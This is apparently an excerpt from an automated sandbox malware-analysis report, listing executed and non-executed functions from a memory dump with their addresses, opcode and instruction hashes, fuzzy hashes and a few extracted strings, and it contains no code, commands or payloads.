                                          • Opcode ID: 699336bca440e056acdc5525449e278022b25250309f45da0211553efb152679
                                          • Instruction ID: f1c8461c382a5ee066d66188edb07239e156b2786145b34fa4061c2a11a2732d
                                          • Opcode Fuzzy Hash: 699336bca440e056acdc5525449e278022b25250309f45da0211553efb152679
                                          • Instruction Fuzzy Hash: 4411C421B1DA094FD774EB68E8A1AF573D1FF54214F510A7AD44AC31E6CD24B64683C1
                                          Function 00007FFD9BBE4D2E Relevance: .1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88c2210d00824c5577189460286e1a105a696d5928c7ff90e041a1997e171e3e
                                          • Instruction ID: 3fadff0ac6aacd24d1d9521d81c58b800c7ab22377cf79837e18134dfb4f20f0
                                          • Opcode Fuzzy Hash: 88c2210d00824c5577189460286e1a105a696d5928c7ff90e041a1997e171e3e
                                          • Instruction Fuzzy Hash: 6B11AB3130950D8FD718CF5CE8A47E877D0EB85328F15027ED90AC32F1CA61A65587C0
                                          Function 00007FFD9BBE96EF Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 921bf304ac72eea0cf648c81bb2a0bda919932af6cf57ae74c546ef21e4989ca
                                          • Instruction ID: 3b4ccdd2fe9274d960ba6591b7e4213ac3d3ee08e32651e388569592d9ecffb9
                                          • Opcode Fuzzy Hash: 921bf304ac72eea0cf648c81bb2a0bda919932af6cf57ae74c546ef21e4989ca
                                          • Instruction Fuzzy Hash: F011F630A1991D8FDFA8EB58D4A5AADB7A1FB58314F0101BE904EE22A5CE35A9448B41
                                          Function 00007FFD9BBE93C8 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7bd4bac93d44c110a7a417405f7a0deb9a133ca254c552ffd7e90b8f030f8242
                                          • Instruction ID: 3d9b98b2858a40038d21b709d0f7bf76ac937a3458f1dfe9c42e0fff08576f94
                                          • Opcode Fuzzy Hash: 7bd4bac93d44c110a7a417405f7a0deb9a133ca254c552ffd7e90b8f030f8242
                                          • Instruction Fuzzy Hash: 0511ED12F1F19F86F638A6E518384BC50207F94B19F170176D88E861F2DC6C2B4822E3
                                          Function 00007FFD9BBE2F4C Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54c4bfdbfa15497c97627335ad41bb4069d2a231b8a99015a6ffcfe08cb6cd65
                                          • Instruction ID: fff16ac9ac73f27617ade511f4529326efd54032a91c16566ae491c6eee0595a
                                          • Opcode Fuzzy Hash: 54c4bfdbfa15497c97627335ad41bb4069d2a231b8a99015a6ffcfe08cb6cd65
                                          • Instruction Fuzzy Hash: D4115792F4F09F86F67816E424710BC80407F94758F2A01BAD81E8E1F2DC4C2A5122D3
                                          Function 00007FFD9BBE99C2 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9641d14f44881c172edbbf30d8e125f1aa946f1c025789933155dfe2733e6f06
                                          • Instruction ID: 3114c494d5f08fdaf7adfc5314a30a5a1e771bd960332e2104dafe46719aeb0f
                                          • Opcode Fuzzy Hash: 9641d14f44881c172edbbf30d8e125f1aa946f1c025789933155dfe2733e6f06
                                          • Instruction Fuzzy Hash: EFF0C23184F2C99FD3228BB088254997FA0BF43208B1900E6D089CB0F2CA2D565AC3A2
                                          Function 00007FFD9BBE30E7 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0faab37f262ab68d56f463c2c8c436a270762f29673d2235d07d36d76155295
                                          • Instruction ID: ae23dbfbaaf247682744e96a2b8fd8161f275f8fc00d74dadeb66ffc62a37392
                                          • Opcode Fuzzy Hash: a0faab37f262ab68d56f463c2c8c436a270762f29673d2235d07d36d76155295
                                          • Instruction Fuzzy Hash: 0B01BF74A1895D8FDF59EB48C4A0BA8B7B1FB68305F5101A9D01ED32A5DA356D80CF41
                                          Function 00007FFD9BBE4D08 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a00c1c63328fc8dc5c814e451df0d593048a257b30ce1eeb376cca028cf4277
                                          • Instruction ID: 992904bd839ffb8e76bd30b1411307eaa8c5ebb8c411ba3e4277ff3ff9eb5996
                                          • Opcode Fuzzy Hash: 6a00c1c63328fc8dc5c814e451df0d593048a257b30ce1eeb376cca028cf4277
                                          • Instruction Fuzzy Hash: 4FF0BE21B4E50E8AF7358694E4722FD3780EF42309F32457EC80E871F1C8196B1662D3
                                          Function 00007FFD9BBE3568 Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d305cc3c0a9758bcda5c5e71692b70aa6bef3dee90369b9fb72b633c056a5e50
                                          • Instruction ID: f7c87761fe3ba73db4d83c6018d48cfe1f89994885aff7d39810dcfe34e199a8
                                          • Opcode Fuzzy Hash: d305cc3c0a9758bcda5c5e71692b70aa6bef3dee90369b9fb72b633c056a5e50
                                          • Instruction Fuzzy Hash: E9E08C3592B18DDAEB619A94C4610AC7BA0FF00248F1001BAE91A421E1CA2427149582
                                          Function 00007FFD9BBEB1AB Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 878f212b8703f5372aab83c028bace369bc9556b354df56c6826f3026d9a9e76
                                          • Instruction ID: ce87a1ebc3cc0a7caf9f4bd879ac3e7b0ed499062fb6d9a14e67298bfb777ff0
                                          • Opcode Fuzzy Hash: 878f212b8703f5372aab83c028bace369bc9556b354df56c6826f3026d9a9e76
                                          • Instruction Fuzzy Hash: A8D09210B1E51B85F239468251B133A71917F00718E62043AE09F519F1C91C7B016A93
                                          Function 00007FFD9BBEA6CF Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f7be6426b5188683148b56cad40d36e844dff0e1e3b23ea310b713e5408764d
                                          • Instruction ID: be3b8a1581eeb07a27971063f68973d37759b9068df9e731624abe1cd1025868
                                          • Opcode Fuzzy Hash: 0f7be6426b5188683148b56cad40d36e844dff0e1e3b23ea310b713e5408764d
                                          • Instruction Fuzzy Hash: 78C04C10F0E24F9FE63156F48C7123916956F0A208B164575D1478A1F3D958BE44A2D3
                                          Function 00007FFD9BBE4251 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 487f792c481cb2cd4a18522bea754ea18c73f3859da6a59e0d6045093bc782e9
                                          • Instruction ID: 8f2a05863a835ef0220400c81db0618e348ab52d021ea07ca1d77345a9164128
                                          • Opcode Fuzzy Hash: 487f792c481cb2cd4a18522bea754ea18c73f3859da6a59e0d6045093bc782e9
                                          • Instruction Fuzzy Hash: 11B00240F1E60B9AE63450E4147507C11552F4624DB664979952E5A1F2DD5C6A4022E2

                                          Non-executed Functions

                                          Function 00007FFD9BBE1208 Relevance: 5.5, Strings: 4, Instructions: 456COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 10_I$20_I$30_I$40_I
                                          • API String ID: 0-3968235154
                                          • Opcode ID: 72576447f932508376e14b578cbeaac9f65bfe646e98bc257457fc7865cbc185
                                          • Instruction ID: 2b3e4a5a0c46370291654faf6b707519bb6de0478c9e00d0d7b36f831e27f273
                                          • Opcode Fuzzy Hash: 72576447f932508376e14b578cbeaac9f65bfe646e98bc257457fc7865cbc185
                                          • Instruction Fuzzy Hash: B7F1DC93A0FAC11FE76246B858251296F92BF9269476A40FBE0D44B1FBF419BD05C3C2
                                          Function 00007FFD9BBE12B8 Relevance: 5.4, Strings: 4, Instructions: 387COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 10_I$20_I$30_I$40_I
                                          • API String ID: 0-3968235154
                                          • Opcode ID: 29f8b1bf132a2195385e6361f0a15c5e154a445e092d8606e29fa4f705526bd4
                                          • Instruction ID: ca493779e91ba226c40bedd40b1b4b13420ac431166ede3d045920d27d0c6b56
                                          • Opcode Fuzzy Hash: 29f8b1bf132a2195385e6361f0a15c5e154a445e092d8606e29fa4f705526bd4
                                          • Instruction Fuzzy Hash: AAD1D993B0FAC11BE76246AC58251256F92BFD269876A00FBE0D44B1FBF419BD05C3D2